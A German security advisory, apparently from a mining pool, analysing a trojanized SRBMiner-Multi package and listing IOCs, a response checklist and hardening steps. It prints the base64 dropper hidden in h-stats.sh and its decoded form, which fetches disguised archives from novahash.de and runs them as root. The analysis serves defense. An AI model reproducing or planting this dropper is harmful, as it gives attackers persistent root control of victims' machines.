Trojanisiertes SRBMiner-3.2.5-Paket im Umlauf
Was Miner wissen müssen — in der Reihenfolge, in der es sie interessiert
Ein gefälschtes SRBMiner-Multi-Archiv wird von miningrepositories.blog ausgeliefert. Der Payload lädt per Hive-OS-Stats-Skript alle zehn Sekunden eine Stage-2 mit Root-Rechten von novahash.de nach — was man, freundlich gesagt, als unverfroren bezeichnen darf.
Nicht von Hand säubern. Rig neu aufsetzen.
Das h-stats.sh-Skript in diesem Archiv läuft als Root bei jedem Hive-OS-Stats-Poll — rund alle zehn Sekunden, solange das Rig läuft. Es lädt eine Stage-2 herunter, führt sie aus, und räumt anschließend die sichtbaren Spuren weg. Werden die Dateien von Hand gelöscht, sind sie beim nächsten Poll wieder da. Freundlich gemeint ist das nicht.
Auf dieser Rechte-Ebene ist dem Gerät nicht mehr zu trauen. Das Rig muss von einem sauberen Betriebssystem-Image komplett neu installiert werden, und sämtliche Zugangsdaten, die je mit dem Gerät in Berührung kamen, müssen rotiert werden — Pool-Konten und API-Schlüssel, SSH-Schlüssel, auf der Platte gespeicherte Wallet-Seeds, gespeicherte Browser-Sitzungen, alles. Zusätzlich jedes weitere Gerät prüfen, das Zugangsdaten mit dem betroffenen Rig teilt — Lateral Movement ist bei dieser Art Angreifer durchaus üblich.
Uns ist klar, dass „Rig neu aufsetzen“ an einem Donnerstag nicht das ist, was man hören möchte. Es ist trotzdem die einzige richtige Antwort.
Selbsterkennung: Wer ab dem 16. April 2026 ein Rig nach einem YouTube-Tutorial des Nutzers „Argenminers“ für C64Chain oder Qubit (QTC) eingerichtet hat — oder wem der Link in einem der beiden Coin-Discords zugespielt wurde — ist auf genau diesem Weg an das Archiv gekommen. Das Rig als kompromittiert behandeln und oben genannte Schritte durchziehen.
Jemand verteilt ein präpariertes SRBMiner-Multi-3.2.5-Paket über miningrepositories.blog. Die Miner-Binary wirkt legitim und dient als Tarnung; der bösartige Teil steckt in h-stats.sh als base64-codierter Block, der bei jedem Hive-OS-Stats-Poll zwei angebliche Bilder (tatsächlich ZIP-Archive) von novahash.de lädt, sie nach /etc/ extrahiert, die enthaltenen Shell-Skripte als Root ausführt und danach aufräumt. Wer das Archiv auf irgendeinem Rig installiert hat: Rig neu aufsetzen. novahash.de und miningrepositories.blog an der Firewall blockieren. SRBMiner ausschließlich von github.com/doktor83/SRBMiner-Multi/releases beziehen und den SHA256 gegen den veröffentlichten Wert prüfen.
IOCs — für die Kurzentschlossenen
Alles Wichtige für Defender in einem Block. Ausführliche Details weiter unten, aber wer nur seine Flotte prüfen will, fängt hier an.
miningrepositories.blog
novahash.de
https://novahash.de/fileslab/recuaikaan.pnghttps://novahash.de/fileslab/mqtato-fla.jpg
https://miningrepositories.blog/srbminer-3.2.5.tar.gz
/etc/recuaikaan.png/etc/recuaikaan.zip/etc/recuaikaan.sh/etc/mqtato-fla.jpg/etc/mqtato-fla.zip/etc/mqtato-fla.sh
9d69228bce9ad3f1cde0f7fa0141e7588922227ee67b3c3f12788a0429909d06
fc2487ec223c91039748e53c08328af91260cd8c
Verteilungsweg
Das Paket wird derzeit als SRBMiner-Multi-Download unter miningrepositories.blog angeboten — einer Domain, die generisch und vertrauenswürdig klingen soll, wenn jemand nach Miner-Binaries sucht. Sie ist kein bekannter oder legitimer Vertriebskanal für SRBMiner und, soweit erkennbar, für gar nichts.
- Der Domainname (
miningrepositories.blog) klingt plausibel, entspricht aber keinem bekannten Upstream-Projekt oder Community-Repository. - Die Versionsnummer
3.2.5ist auffällig veraltet — das echte SRBMiner-Multi ist längst weiter. „Alt, aber glaubwürdig“ ist ein Klassiker bei trojanisierten Paketen, weil es weniger Fragen zur Quelle aufwirft. - Der offizielle Release-Kanal mit veröffentlichten SHA256-Prüfsummen ist github.com/doktor83/SRBMiner-Multi/releases. Alles andere, das „SRBMiner“ heißen will, verdient das gleiche Misstrauen wie ein Fremder, der einem am Bahnhof ein belegtes Brötchen anbietet.
Auslieferung: YouTube-Tutorials und Discord-Seeding (beobachtet)
Das trojanisierte Archiv liegt nicht einfach auf einer zufälligen Domain herum und wartet, dass jemand darüber stolpert. Es wurde gezielt über Kanäle beworben, denen Miner vertrauen:
- YouTube-Tutorials. Ein Nutzer namens „Argenminers“ hat am 16. April 2026 ein Setup-Video veröffentlicht, das Schritt für Schritt erklärt, wie man C64Chain auf Hive OS mit einem Custom-Flightsheet mint. Erstellung des Flightsheets, Custom-Miner-URL, Wallet-Adresse — alles sauber durchgeklickt. Die Custom-Miner-URL, die das Video angibt, ist
https://miningrepositories.blog/srbminer-3.2.5.tar.gz. Wer das Tutorial nachgebaut hat, hat das trojanisierteh-stats.shals Teil des „einfach der Anleitung folgen“ mitinstalliert. - Discord-Seeding. Dasselbe Archiv wurde im Mining-Kanal des C64Chain-Discords und ebenso im Mining-Kanal des Qubit (QTC)-Discords gepostet, jeweils als hilfreicher Tipp für Einsteiger präsentiert.
Was das über das Vorgehen des Angreifers verrät
Das ist Social Engineering, kein Drive-by-Download. Jeder Schritt des Ablaufs ist bewusst so gewählt, dass die Deckung des Opfers runtergeht:
- Kleine Coins mit aktiven Discord-Communities und einem stetigen Zustrom an Einsteigern aussuchen. C64Chain und QTC sind genau der Typ Coin, bei dem ein neuer Miner in den Discord kommt, fragt, wie er loslegen kann, und dankbar den ersten Link annimmt, den ihm jemand Hilfsbereites in die Hand drückt. Große Coins werden kritischer geprüft, kleine werden gutgläubiger angenommen.
- Ein funktionierendes Tutorial produzieren. Das YouTube-Video zeigt ein Rig, das tatsächlich mint — weil die Miner-Binary im Archiv ein echter, lauffähiger Miner ist (Tarnung). Sichtbarer Beweis überzeugt: ein Video mit einlaufenden Accepted Shares ist mehr wert als tausend „vertrau mir“.
- Erst Reputation aufbauen, dann bewaffnen. Sobald das Video existiert und ein paar Kommentare sagen „hat bei mir funktioniert, danke!“, trägt sich der Link selbst weiter — jeder neue Zuschauer sieht Social Proof, bevor er einen Grund zum Misstrauen sieht.
- In Einsteiger-Kanäle streuen. Den Link in Discord-Kanäle posten, wo Neulinge um Setup-Hilfe bitten. Der Payload läuft beim ersten Stats-Poll; der Angreifer braucht vom Opfer nichts außer „mach das Tutorial nach“.
- Darauf setzen, dass Community-Moderatoren keine Archive auditieren. Kaum ein Coin-Discord hat die Ressourcen, jedes „hilfreiche“ Tarball, das in seinem Mining-Kanal landet, zu reverse-engineeren. Ein freundlicher Nutzer mit YouTube-Kanal wirkt wie ein Community-Mitglied, nicht wie eine Bedrohung.
Ein funktionierendes YouTube-Tutorial und ein freundlicher Discord-Post sind keine Vertrauenssignale. Das Video des Angreifers zeigt fast sicher ein korrekt minendes Rig — weil es das tut. Der Schaden sitzt in h-stats.sh, läuft als Root, auf dem Rig, das der Zuschauer gerade liebevoll konfiguriert hat. Für Einsteiger: Miner-Downloads nur aus dem offiziellen Projekt-Repository, SHA256 jedes Mal prüfen. Für Coin-Discords: im Mining-Kanal einen festen Hinweis pinnen — „keinen Archiven vertrauen, die hier gepostet werden, solange sie nicht aus dem offiziellen Projekt stammen“.
Wer Teil der C64Chain- oder Qubit (QTC)-Community ist und sein Rig nach dem Argenminers-Tutorial eingerichtet oder den Link an Freunde weitergegeben hat — bitte dieses Advisory in der Community teilen und jedes Rig, das nach dieser Anleitung aufgesetzt wurde, als kompromittiert behandeln.
Was im Archiv steckt
Das Archiv ist eine vollständige Hive-OS-Custom-Miner-Integration — und eine Minerstat-Integration (mmp-*) ist gleich mit dabei. Echte Distributionen liefern das eine oder das andere aus, nicht beides, wodurch die Kombination allein schon verräterisch ist.
| Datei | Größe | Status |
|---|---|---|
h-manifest.conf | 616 B | Sauber (nur kosmetische Anpassungen) |
h-run.sh | 764 B | Sauber (nur kosmetische Anpassungen) |
h-config.sh | 205 B | Sauber |
h-stats.sh | 8.646 B | BÖSARTIG — enthält Dropper |
mmp-stats.sh | 4.116 B | Sauber |
mmp-external.conf | 63 B | Sauber (Versionsabweichung) |
srbminer_bin | 20.309.184 B (~20 MB) | Vermutlich echt/fast echt (Tarnung) |
Verräterische Spuren der Neuverpackung
Keines der folgenden Merkmale ist für sich genommen bösartig — sie sind die diagnostischen Hinweise, dass das Paket nicht von dort kommt, woher es behauptet zu kommen:
- Spanische Kommentare in
h-run.shundh-manifest.conf— z. B. „Verificar si ya está corriendo“, „Cargar manifest“, „Ejecutar el binario con parámetros“, „Nombre del miner“, „Ruta al archivo de configuración“. Legitime Upstream-SRBMiner-Integrationen sind auf Englisch. - Interne Versionsabweichung.
h-manifest.confdeklariertCUSTOM_VERSION=3.2.5;mmp-external.confdeklariertEXTERNAL_VERSION="2.6.8-custom". Echte Pakete sind intern konsistent. Dieses nicht. - Hive- und Minerstat-Integrationen gemeinsam ausgeliefert. Upstream liefert jeweils nur eins, nie beides.
- Nicht gestrippte Binary. Upstream-Release-Binaries werden gestrippt, um Größe zu sparen und Analyse zu erschweren. Diese hier nicht — deutlicher Hinweis darauf, dass der Angreifer aus dem Quellcode selbst gebaut hat.
Der Payload: h-stats.sh
h-stats.sh ist zum größten Teil — ärgerlicherweise — ein vollkommen funktionaler Hive-OS-Stats-Parser. Er fragt die HTTP-API des Miners auf 127.0.0.1:$MINER_API_PORT ab, liest Hashrate, Shares, Temperaturen und Lüfterwerte für GPU- und CPU-Worker, kommt mit Single- und Dual-Algo-Mining zurecht und liefert gültiges Stats-JSON an den Hive-Agenten zurück. Das ist keine Nebensächlichkeit, sondern essentielle Tarnung: Würde das Skript Fehler werfen, erschiene das Rig bei Hive als offline und der Operator würde binnen Minuten nachsehen.
Nach der legitimen Stats-Logik und vor den abschließenden Fallback-Zuweisungen wurde dieser Block eingefügt:
p="bm9odXAgc3VkbyB3Z2V0IC1xIGh0dHBzOi8vbm92YWhhc2guZGUvZmlsZXNsYWIvcmVjdWFpa2Fhbi5wbmcg
LU8gL2V0Yy9yZWN1YWlrYWFuLnppcCAmJiBzdWRvIHVuemlwIC1xIC1vIC9ldGMvcmVjdWFpa2Fhbi56aXAgLWQg
L2V0YyAmJiBzdWRvIGJhc2ggL2V0Yy9yZWN1YWlrYWFuLnNoIDsgc3VkbyB3Z2V0IC1xIGh0dHBzOi8vbm92YWhh
c2guZGUvZmlsZXNsYWIvbXF0YXRvLWZsYS5qcGcgLU8gL2V0Yy9tcXRhdG8tZmxhLnppcCAmJiB1bnppcCAtcSAt
byAvZXRjL21xdGF0by1mbGEuemlwIC1kIC9ldGMgJiYgYmFzaCAvZXRjL21xdGF0by1mbGEuc2ggOyBybSAvZXRj
L21xdGF0by1mbGEuemlwIDsgcm0gL2V0Yy9tcXRhdG8tZmxhLnNoIDsgcm0gL2V0Yy9yZWN1YWlrYWFuLnNoIDsg
cm0gL2V0Yy9yZWN1YWlrYWFuLnppcCA+IC9kZXYvbnVsbCAyPiYxICY="
nohup sh -c "$(echo "$p" | base64 -d)" > /dev/null 2>&1 &
Dekodiert lautet der base64-Block:
nohup sudo wget -q https://novahash.de/fileslab/recuaikaan.png -O /etc/recuaikaan.zip \
&& sudo unzip -q -o /etc/recuaikaan.zip -d /etc \
&& sudo bash /etc/recuaikaan.sh ; \
sudo wget -q https://novahash.de/fileslab/mqtato-fla.jpg -O /etc/mqtato-fla.zip \
&& unzip -q -o /etc/mqtato-fla.zip -d /etc \
&& bash /etc/mqtato-fla.sh ; \
rm /etc/mqtato-fla.zip ; rm /etc/mqtato-fla.sh ; \
rm /etc/recuaikaan.sh ; rm /etc/recuaikaan.zip > /dev/null 2>&1 &
Ablauf, Schritt für Schritt
- Zwei vermeintliche Bilddateien (
.pngund.jpg) werden perwgetvonnovahash.degeladen. Die Bildendungen sind Tarnung — der eigentliche Inhalt sind ZIP-Archive. Eine bekannte Methode, um naive Egress-Filter auszutricksen, die Skript- und Archiv-Traffic prüfen, Bilder aber durchwinken. - Jedes Archiv wird nach
/etc/geschrieben, in.zipumbenannt und mitunzip -o(Überschreiben) entpackt. - In jedem Archiv steckt ein Shell-Skript (
recuaikaan.sh,mqtato-fla.sh), das anschließend ausgeführt wird — das erste explizit mitsudo, das zweite im bereits bestehenden Root-Kontext des Hive-Agenten. - Alle vier Artefakte (beide
.zip-Dateien und beide.sh-Skripte) werden anschließend aus/etc/gelöscht. Das säubert den Dropper-Fußabdruck: Eine Nachschau in/etc/findet nichts mehr, während das, was die Stage-2-Skripte anderswo installiert haben, resident bleibt. - Die gesamte Kette läuft im Hintergrund per
nohup … &, damit die legitime Stats-Ausgabe weder blockiert noch verzögert wird. Hive sieht weiterhin ein „gesundes“ Rig.
Warum h-stats.sh die perfekte Stelle ist
- Hive OS ruft
h-stats.shin kurzen, festen Intervallen auf — in der Regel etwa alle zehn Sekunden — um Statistiken abzufragen. - Der Hive-Agent läuft als Root. Das
user-Konto hat passwortloses sudo. Jedessudoim Payload läuft daher lautlos durch — ohne Passwortabfrage und ohne Auth-Logeintrag. - Das Skript läuft während der gesamten Lebensdauer des Rigs. Eingeschaltet, Netzwerk oben, Miner läuft — unbegrenzt.
Was das dem Angreifer einbringt:
- Automatische Ausführung bei der Installation. Keine Nutzeraktion nötig.
- Root-Rechte ohne Social-Engineering-Dialog.
- Retry bei Fehlern. Ist
novahash.dekurzzeitig unerreichbar, versucht der Dropper es zehn Sekunden später erneut. - Selbstheilende Infektion. Entfernt jemand Stage-2-Komponenten per Hand, werden sie beim nächsten Poll wieder abgelegt — solange
h-stats.shauf der Platte liegt. Deshalb funktioniert Handaufräumen nicht. - Stille.
>/dev/null 2>&1 &löst sich vom Terminal und schluckt jede Ausgabe. In Hive ist davon nichts zu sehen.
Stellen Sie sich vor, jemand wirft einen Zettel in Ihren Briefkasten, auf dem steht: „Bitte die Hintertür offen lassen.“ Und wirft denselben Zettel alle zehn Sekunden erneut ein. Für immer. Und räumt den vorherigen vorher jedes Mal weg. Sie können das nicht wegsortieren. Sie müssen das Schloss wechseln.
Der Tarn-Miner: srbminer_bin
Die im Paket enthaltene Binary sieht nach einem legitimen oder nahezu legitimen SRBMiner-Multi-Build aus. Aus Angreifersicht besteht ihre Aufgabe darin, unauffällig zu sein:
- Datei: ELF 64-bit LSB shared object, x86-64, dynamisch gelinkt.
- Größe: 20.309.184 Byte (~20 MB).
- SHA256:
9d69228bce9ad3f1cde0f7fa0141e7588922227ee67b3c3f12788a0429909d06 - BuildID:
fc2487ec223c91039748e53c08328af91260cd8c - Gestrippt: Nein (für ein Upstream-Release untypisch — die sind gestrippt).
- Eingebettete Build-Pfade: verweisen auf
/home/doktor/VSCode/SRBMiner-Multi/Libs/{clew,libmicrohttpd,libressl,hwloc}/linux— die tatsächlichen Pfade des SRBMiner-Autors (doktor83). Passt zu einem Build aus echtem oder leicht verändertem Quellcode. - Eingebettete URLs: keine. Keine Referenzen auf
novahash.deoder die Dropper-Dateinamen.
Der Plan des Angreifers setzt darauf, dass der Miner plausible Hashrate und Shares produziert, damit Hive- und Minerstat-Dashboards normal aussehen und dem Operator kein Anlass zum Nachsehen bleibt. Alle beobachtete bösartige Funktionalität liegt in h-stats.sh; die Binary ist nicht der Angriffsvektor.
Den SHA256 der Binary mit den bekannten Hashes auf github.com/doktor83/SRBMiner-Multi/releases vergleichen oder die Datei an VirusTotal senden. Ein Mismatch mit jedem veröffentlichten SRBMiner-Hash reicht, um die Binary unabhängig von diesem Advisory als verdächtig zu behandeln.
Vollständige Indikatoren der Kompromittierung
Netzwerk
- Domain:
novahash.de— an Firewall und DNS blockieren https://novahash.de/fileslab/recuaikaan.pnghttps://novahash.de/fileslab/mqtato-fla.jpg- Verteiler-Domain:
miningrepositories.blog
Dateisystem (Dropper-Artefakte)
Werden nach Ausführung vom Dropper gelöscht — Abwesenheit ist kein Freibrief:
/etc/recuaikaan.png
/etc/recuaikaan.zip
/etc/recuaikaan.sh
/etc/mqtato-fla.jpg
/etc/mqtato-fla.zip
/etc/mqtato-fla.sh
Datei-Hashes
srbminer_binSHA256:9d69228bce9ad3f1cde0f7fa0141e7588922227ee67b3c3f12788a0429909d06srbminer_binBuildID:fc2487ec223c91039748e53c08328af91260cd8c
Prozess- und Verhaltenssignaturen
wget-Aufrufe annovahash.deaus dem Hive-user-Konto oder von Rootnohup sh -c-Aufrufe, gestartet aush-stats.shsudo bash /etc/*.sh-Einträge in Sudo-Logs (sofern Auditing aktiviert ist)- Ungewöhnliche
.zip-,.png- oder.jpg-Dateien, die zu irgendeinem Zeitpunkt in/etc/auftauchen
Paket-Warnzeichen (nützlich zum Auffinden ähnlicher trojanisierter Pakete)
- Spanische Kommentare in Hive- oder Minerstat-Integrationsskripten, die upstream auf Englisch ausgeliefert werden
- Interne Versionsabweichungen zwischen Manifest-Dateien
- Nicht gestrippte Release-Binaries
- Hive- und Minerstat-Integrationen in einem Paket
- Lange base64-Strings in beliebigen
h-*.sh- odermmp-*.sh-Skripten base64 -d | sh,base64 -d | bash,xxd -r -p | shoder ähnliche Decode-und-Execute-Pipelines in Stats- oder Run-Skripten
Incident-Response-Checkliste
Wer das Paket auf irgendeinem Rig oder Server installiert hat, arbeitet die folgenden Punkte der Reihe nach ab. Leicht verdriesslich dabei. Das ist die korrekte Haltung.
Isolieren
Das betroffene Rig sofort vom Netzwerk trennen. Nicht zuerst herunterfahren — der Speicherinhalt kann nützlich sein, und manche Persistenzmechanismen werden erst beim Booten aktiv.
C2 überall blockieren
novahash.de an DNS-Sinkhole und Firewall-Deny-Listen eintragen — im gesamten Netzwerk, nicht nur auf dem betroffenen Rig. Lateral Movement steht im Raum; andere Systeme können mit angetastet worden sein.
Snapshot für die Forensik (falls gewünscht)
Wer die Geduld mitbringt: Vor der Bereinigung ein Disk-Image erzeugen und, wenn Werkzeuge vorhanden sind, den Speicher dumpen. Wer nicht — verständlich, dann direkt zur Bereinigung.
Dropper-Artefakte prüfen
ls -la /etc/recuaikaan* /etc/mqtato* 2>/dev/null
Userland-Rootkit-Hinweise prüfen
cat /etc/ld.so.preload # sollte leer sein oder nicht existieren
Nach kürzlich geänderten Dateien suchen
find /etc /usr/local/bin /usr/local/sbin /root /tmp /var/tmp /dev/shm \
-mtime -30 -type f -ls 2>/dev/null
Persistenzmechanismen prüfen
crontab -l
for u in $(cut -f1 -d: /etc/passwd); do crontab -u "$u" -l 2>/dev/null; done
ls -la /etc/cron.* /etc/cron.d/ /var/spool/cron/
systemctl list-unit-files --state=enabled
systemctl list-timers --all
SSH-Backdoors aufspüren
find / -name "authorized_keys" 2>/dev/null -exec ls -la {} \; -exec cat {} \;
grep -E '^(PermitRootLogin|PasswordAuthentication|AuthorizedKeysFile)' /etc/ssh/sshd_config
Ausgehende Verbindungen prüfen
ss -tnp | grep -E '(srbminer|sh|wget|curl)'
Miner-Konfiguration abgleichen
Wallet-Adresse und Pool-URL in der tatsächlichen Miner-Konfiguration gegen das prüfen, was in Hive oder Minerstat hinterlegt ist. Stage-2-Payloads dieser Art ersetzen gern Mining-Credentials durch eigene, sodass das Opfer die Stromrechnung pflichtbewusst für den Angreifer bezahlt. Was schon etwas dreist ist.
Rootkit-Scanner laufen lassen
chkrootkit
rkhunter --check --skip-keypress
Sudo-Logs prüfen
grep -E 'wget|bash /etc' /var/log/auth.log /var/log/secure 2>/dev/null
Falls ein Indikator anschlägt — neu aufsetzen. Punkt.
Userland-Code, der in kurzen Intervallen als Root läuft, ist per Hand nicht zuverlässig zu entfernen. Betriebssystem auf dem Rig neu installieren, alle Zugangsdaten rotieren, die das Gerät berührt haben (Pool-Konten, SSH-Schlüssel, irgendwo auf der Platte gespeicherte Wallet-Seeds) und sämtliche Geräte prüfen, die Zugangsdaten mit dem betroffenen Rig teilen. Gute Gelegenheit, ein paar Dinge aufzuräumen, die man ohnehin länger vor sich hergeschoben hat.
Härtung: so landen Sie gar nicht erst hier
Ein paar Gewohnheiten, die genau das hier von Anfang an verhindert hätten. Keine davon neu, alle ein bisschen langweilig — langweilig ist das angestrebte Gefühl.
Für SRBMiner konkret: github.com/doktor83/SRBMiner-Multi/releases. Für jeden anderen Miner: offizielle Projektseite auf GitHub suchen — in der Regel verlinkt von der Getting-Started-Seite des Pools. Alles andere ist Glaubensfrage.
Offizielle Miner-Releases veröffentlichen Prüfsummen. sha256sum auf den Download, Vergleich mit dem veröffentlichten Wert. Das dauert acht Sekunden. Ein Rig neu aufzusetzen dauert deutlich länger.
Sofern nicht aus einer bekannten, vertrauenswürdigen Community-Quelle. Stats-Integrations-Wrapper sind eine Lieblings-Injection-Stelle, gerade weil die meisten Operatoren sie nie lesen. Das ist exakt der Grund, warum wir hier sind.
30 Sekunden less h-stats.sh, bevor ein Flight-Sheet auf einen neuen Custom-Miner zeigt. Lange kodierte Strings, Netzwerkaufrufe zu unbekannten Domains, Schreibzugriffe auf /etc/ oder /usr/local/ — jedes Einzelne davon ist Anlass, kurz innezuhalten.
Rigs müssen keine beliebigen Domains erreichen. Pool-IPs auf Allowlist, alles andere blockieren. Ein ordentlich gefiltertes Rig lässt sich auch mit laufendem bösartigem Skript nicht stagen, weil es keine Quelle für Stage-2 findet.
Ein Rig, das HTTPS-Anfragen an irgendetwas außerhalb Ihres Pools richtet, ist grundsätzlich verdächtig. Das ist keine Paranoia — das ist die billigste Detektion, die Sie haben.
Unter Hive OS läuft der Hive-Agent als Root, und das user-Konto hat passwortloses sudo. Jedes Skript, das der Agent aufruft, hat damit effektiv Root-Rechte. Bewusst damit umgehen. Falls Ihr Framework unprivilegierte Mining-Nutzer erlaubt, verwenden Sie sie.
Ein Wort von Suprnova
Pool-Betreiber und deren Miner sind für diese Art Angriff eine besonders lohnende Zielgruppe. Ein trojanisierter Miner auf einem Rig kompromittiert nicht nur dieses Rig — er kann Hashrate vom eigentlichen Pool umleiten, Pool-Credentials aus Config-Dateien ziehen und als Sprungbrett in die weitere Infrastruktur dienen. Unsere Nutzer sind im Schnitt technischer, wertvoller und gezielter ins Visier genommen als die allgemeine Population der „Menschen, die Dinge herunterladen“ — und diese Aufmerksamkeit ist, unter dem Strich, kein Kompliment.
Wenn Ihnen ein verdächtiger Miner-Download, ein ungewöhnliches Archiv oder eine Discord-/Telegram-DM mit einem „custom“ oder „patched“ Miner auffällt, leiten Sie es bitte an admin@suprnova.cc weiter oder posten Sie es in unserem Discord. Wir sehen es uns an, aktualisieren dieses Advisory bei Bedarf und warnen die Community. Gürtel, Hosenträger und ein gesundes Maß an gemeinschaftlicher Paranoia — die drei Säulen eines glücklichen Mining-Rigs.
Fazit
Das Archiv unter https://miningrepositories.blog/srbminer-3.2.5.tar.gz ist trojanisiert. Die Miner-Binary ist Tarnung; der eigentliche Payload steckt in h-stats.sh und kontaktiert novahash.de etwa alle zehn Sekunden — als Root, solange das Rig läuft.
Wer dieses Paket auf irgendeinem Rechner installiert hat, muss ihn neu aufsetzen. Nicht „untersuchen“. Nicht „bereinigen“. Neu aufsetzen. Alle Zugangsdaten, die das Gerät je berührt haben, rotieren. Alle Geräte prüfen, die Zugangsdaten mit ihm geteilt haben. Eine mittlere Option, die ebenfalls korrekt wäre, gibt es nicht.
novahash.de und miningrepositories.blog blockieren. An DNS und an der Egress-Firewall. Überall, nicht nur auf dem betroffenen Rig.
Miner nur aus verifizierten Upstream-Quellen laden und jedes Mal den SHA256 prüfen. Die offiziellen SRBMiner-Releases liegen auf github.com/doktor83/SRBMiner-Multi/releases. Alles andere, das vorgibt, SRBMiner zu sein, ist bestenfalls nicht vertrauenswürdig.
Verwandte Artikel
Mining-Pool-Sicherheit
Wie Mining-Pools sich und ihre Miner gegen DDoS, Exploits und andere Bedrohungen schützen.
Mining-Hardware-Leitfaden
Praktischer Leitfaden zu Auswahl und Pflege von Mining-Hardware — inklusive der langweiligen Software-Seite.
Ein Tag im Leben eines Pool-Betreibers
Wenn kompromittierte Hosts auf den Pool zeigen, verlieren alle — auch der Dienstagmorgen des Betreibers.